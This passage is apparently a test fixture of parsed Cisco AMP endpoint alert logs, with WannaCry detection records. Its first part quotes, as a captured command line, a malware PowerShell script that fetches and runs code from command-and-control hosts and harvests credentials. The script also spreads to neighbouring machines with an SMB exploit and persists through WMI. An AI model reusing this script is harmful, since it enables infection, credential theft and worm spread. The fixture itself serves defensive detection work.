 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) " + ], + "cmd_line": "powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) ", + "parent_app": "WmiPrvSE.exe", + "parent_app_path": "C:\\Windows\\System32\\wbem", + "parent_pid": 2236, + "parent_puid": 132461352663910600, + "parent_user": "SYSTEM", + "parent_user_sid": "010100000000000512000000", + "pid": 10724, + "puid": 132465072105597400, + "ts": 1602033881727175700, + "user": "user@testdomain.com", + "user_sid": "010100000000000512000000" + } + } + ], + "cisco.amp.bp_data.details.matched_activity.limited": false, + "cisco.amp.bp_data.details.matched_activity.matched": 1, + "cisco.amp.bp_data.details.schema": "endpoint", + "cisco.amp.bp_data.details.schema_epoch": 2, + "cisco.amp.bp_data.details.sig_id": 20190517123456, + "cisco.amp.bp_data.details.sig_rev": 5, + "cisco.amp.bp_data.detection": "apde:20190517123456", + "cisco.amp.bp_data.end_ts": 1610640884, + "cisco.amp.bp_data.engine": "apde", + "cisco.amp.bp_data.id": "d2616Ab846", + "cisco.amp.bp_data.name": "WMIPRVSE Launched Encoded Powershell Command", + "cisco.amp.bp_data.normalized.name": "wmiprvse launched encoded powershell command", + "cisco.amp.bp_data.normalized.observables.file.name": [ + "powershell.exe", + "wmiprvse.exe" + ], + "cisco.amp.bp_data.normalized.observables.file.path": [ + "c:\\windows\\system32\\windowspowershell\\v1.0", + "c:\\windows\\system32\\wbem" + ], + "cisco.amp.bp_data.observables.file": [ + { + "md5": "a575a7610e5f003cc36df39e07c4ba7d", + "name": "powershell.exe", + "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "properties": { + "copyright": "\u00a9 Microsoft Corporation. 
All rights reserved.", + "file_version": "10.0.14409.1005", + "product": "Microsoft\u00ae Windows\u00ae Operating System", + "product_version": "10.0.14409.1005" + }, + "sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e", + "sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218", + "size": 443392, + "type_id": 1 + }, + { + "md5": "d683c112190f4b4c6d477d693ee88e35", + "name": "WmiPrvSE.exe", + "path": "C:\\Windows\\System32\\wbem", + "properties": { + "copyright": "\u00a9 Microsoft Corporation. All rights reserved.", + "file_version": "10.0.14409.1005", + "product": "Microsoft\u00ae Windows\u00ae Operating System", + "product_version": "10.0.14409.1005" + }, + "sha1": "67858ead93feed62c0b1865369840e6e8086f53b", + "sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334", + "size": 425984, + "type_id": 1 + } + ], + "cisco.amp.bp_data.remediated": false, + "cisco.amp.bp_data.severity": "medium", + "cisco.amp.bp_data.silent": false, + "cisco.amp.bp_data.start_ts": 1610640884, + "cisco.amp.bp_data.tactics": [ + "TA0002", + "TA0005", + "TA0008" + ], + "cisco.amp.bp_data.ts": 1610640884, + "cisco.amp.bp_data.type": "activity", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "be:b0:d5:89:e2:96" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "WMIPRVSE Launched Encoded Powershell Command", + "cisco.amp.event_type_id": 553648222, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.mitre_tactics": [ + "TA0002", + "TA0005", + "TA0008" + ], + "cisco.amp.related.mac": [ + "be:b0:d5:89:e2:96" + ], + "cisco.amp.timestamp_nanoseconds": 810000000, + "event.action": "Threat Detection", + "event.dataset": "cisco.amp", + "event.id": 6880683125978957000, + "event.kind": "alert", + "event.module": "cisco", + 
"event.severity": 2, + "fileset.name": "amp", + "host.hostname": "Demo_BP_WMIPRVSE", + "host.name": "Demo_BP_WMIPRVSE", + "input.type": "log", + "log.offset": 38130, + "related.hosts": [ + "Demo_BP_WMIPRVSE" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867969", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 717000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 68391, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": 
"test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503298", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 686000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 69603, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847665", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + 
"cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 686000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 70815, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867977", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 639000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 72027, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831755", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 73239, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + 
"related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831754", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 74476, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ 
+ { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831753", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 873000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "qeriuwjhrf", + "file.path": "\\\\?\\C:\\Windows\\qeriuwjhrf", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 75732, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229327140847658", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": 
